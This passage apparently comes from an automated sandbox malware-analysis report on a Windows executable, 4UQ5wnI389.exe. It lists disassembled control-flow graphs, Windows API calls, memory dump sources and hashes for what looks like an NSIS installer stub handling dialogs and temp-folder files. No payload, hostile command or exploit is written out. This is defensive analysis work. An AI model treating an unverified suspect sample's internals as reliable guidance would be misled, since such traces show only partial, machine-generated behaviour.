                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 579 405cb6-405cba 577->579 580 405b42-405b44 578->580 581 405b53-405b63 call 4063e8 578->581 582 405c64-405c69 580->582 583 405b4a-405b4d 580->583 587 405b72-405b73 call 405d09 581->587 588 405b65-405b70 lstrcatW 581->588 582->579 586 405c6b-405c6e 582->586 583->581 583->582 589 405c70-405c76 586->589 590 405c78-405c80 call 40672b 586->590 591 405b78-405b7c 587->591 588->591 589->579 590->579 597 405c82-405c96 call 405cbd call 405ab2 590->597 595 405b88-405b8e lstrcatW 591->595 596 405b7e-405b86 591->596 598 405b93-405baf lstrlenW FindFirstFileW 595->598 596->595 596->598 614 405c98-405c9b 597->614 615 405cae-405cb1 call 405450 597->615 599 405bb5-405bbd 598->599 600 405c59-405c5d 598->600 602 405bdd-405bf1 call 4063e8 599->602 603 405bbf-405bc7 599->603 600->582 605 405c5f 600->605 616 405bf3-405bfb 602->616 617 405c08-405c13 call 405ab2 602->617 606 405bc9-405bd1 603->606 607 405c3c-405c4c FindNextFileW 603->607 605->582 606->602 610 405bd3-405bdb 606->610 607->599 613 405c52-405c53 FindClose 607->613 610->602 610->607 613->600 614->589 618 405c9d-405cac call 405450 call 4061ae 614->618 615->579 616->607 619 405bfd-405c06 call 405afa 616->619 627 405c34-405c37 call 405450 617->627 628 405c15-405c18 617->628 618->579 619->607 627->607 631 405c1a-405c2a call 405450 call 4061ae 628->631 632 405c2c-405c32 628->632 631->607 632->607
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-1432729950
                                                                                                            • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 267 403eb5-403ec2 SetWindowPos 264->267 268 403ec8-403ecb 264->268 270 40408c-404091 call 4043ab 265->270 271 40404e-404051 265->271 266->265 267->268 273 403ee5-403eeb 268->273 274 403ecd-403edf ShowWindow 268->274 279 404096-4040b1 270->279 276 404053-40405e call 401389 271->276 277 404084-404086 271->277 280 403f07-403f0a 273->280 281 403eed-403f02 DestroyWindow 273->281 274->273 276->277 292 404060-40407f SendMessageW 276->292 277->270 278 40432c 277->278 286 40432e-404335 278->286 284 4040b3-4040b5 call 40140b 279->284 285 4040ba-4040c0 279->285 289 403f0c-403f18 SetWindowLongW 280->289 290 403f1d-403f23 280->290 287 404309-40430f 281->287 284->285 295 4040c6-4040d1 285->295 296 4042ea-404303 DestroyWindow EndDialog 285->296 287->278 294 404311-404317 287->294 289->286 297 403fc6-403fd4 call 4043c6 290->297 298 403f29-403f3a GetDlgItem 290->298 292->286 294->278 300 404319-404322 ShowWindow 294->300 295->296 301 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 295->301 296->287 297->286 302 403f59-403f5c 298->302 303 403f3c-403f53 SendMessageW IsWindowEnabled 298->303 300->278 331 404126-40412b 301->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 301->332 304 403f61-403f64 302->304 305 403f5e-403f5f 302->305 303->278 303->302 309 403f72-403f77 304->309 310 403f66-403f6c 304->310 308 403f8f-403f94 call 404338 305->308 308->297 312 403fad-403fc0 SendMessageW 309->312 314 403f79-403f7f 309->314 310->312 313 403f6e-403f70 310->313 312->297 313->308 317 403f81-403f87 call 40140b 314->317 318 403f96-403f9f call 40140b 314->318 329 403f8d 317->329 318->297 327 403fa1-403fab 318->327 327->329 329->308 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->279 351 4041ff-404201 340->351 351->279 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->287 356 404244-404271 CreateDialogParamW 353->356 354->278 355 404219-40421f 354->355 355->279 357 404225 355->357 356->287 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->287
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 3282139019-3251261122
                                                                                                            • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 395 403bc2-403bc6 390->395 391->392 393 403cd5-403cdd call 40140b 392->393 394 403c56-403c86 RegisterClassW 392->394 408 403ce7-403cf2 call 403dae 393->408 409 403cdf-403ce2 393->409 397 403da4 394->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 394->398 400 403bd8-403be4 lstrlenW 395->400 401 403bc8-403bd5 call 405cea 395->401 406 403da6-403dad 397->406 398->393 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1642274604
                                                                                                            • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 488 4030df-4030e5 462->488 490 403139-40313e 463->490 491 40314d-40317d call 40345d call 4031d6 463->491 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 487 40300e-403015 470->487 473->474 479 403087-403095 call 4068b5 474->479 480 403098-4030a2 474->480 479->480 480->452 480->453 487->474 492 403017-40301e 487->492 488->459 488->463 490->445 500 403182-403185 491->500 492->474 494 403020-403027 492->494 494->474 495 403029-403030 494->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4UQ5wnI389.exe,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4UQ5wnI389.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\4UQ5wnI389.exe,C:\Users\user\Desktop\4UQ5wnI389.exe,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4UQ5wnI389.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-1698280262
                                                                                                            • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 516 406457-40645e 514->516 517 406662-40666d 515->517 518 406463-406470 515->518 516->515 520 406678-406679 517->520 521 40666f-406673 call 4063e8 517->521 518->517 519 406476-406482 518->519 522 406643 519->522 523 406488-4064c6 519->523 521->520 527 406651-406654 522->527 528 406645-40664f 522->528 525 4065e6-4065ea 523->525 526 4064cc-4064d7 523->526 531 4065ec-4065f2 525->531 532 40661d-406621 525->532 529 4064f0 526->529 530 4064d9-4064de 526->530 527->515 528->515 538 4064f7-4064fe 529->538 530->529 535 4064e0-4064e3 530->535 536 406602-40660e call 4063e8 531->536 537 4065f4-406600 call 40632f 531->537 533 406630-406641 lstrlenW 532->533 534 406623-40662b call 40640a 532->534 533->515 534->533 535->529 540 4064e5-4064e8 535->540 549 406613-406619 536->549 537->549 542 406500-406502 538->542 543 406503-406505 538->543 540->529 545 4064ea-4064ee 540->545 542->543 547 406540-406543 543->547 548 406507-40652e call 4062b6 543->548 545->538 550 406553-406556 547->550 551 406545-406551 GetSystemDirectoryW 547->551 560 406534-40653b call 40640a 548->560 561 4065ce-4065d1 548->561 549->533 553 40661b 549->553 556 4065c1-4065c3 550->556 557 406558-406566 GetWindowsDirectoryW 550->557 555 4065c5-4065c9 551->555 554 4065de-4065e4 call 40667c 553->554 554->533 555->554 562 4065cb 555->562 556->555 559 